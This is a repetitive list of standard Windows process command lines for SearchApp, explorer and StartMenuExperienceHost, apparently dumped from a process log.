"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

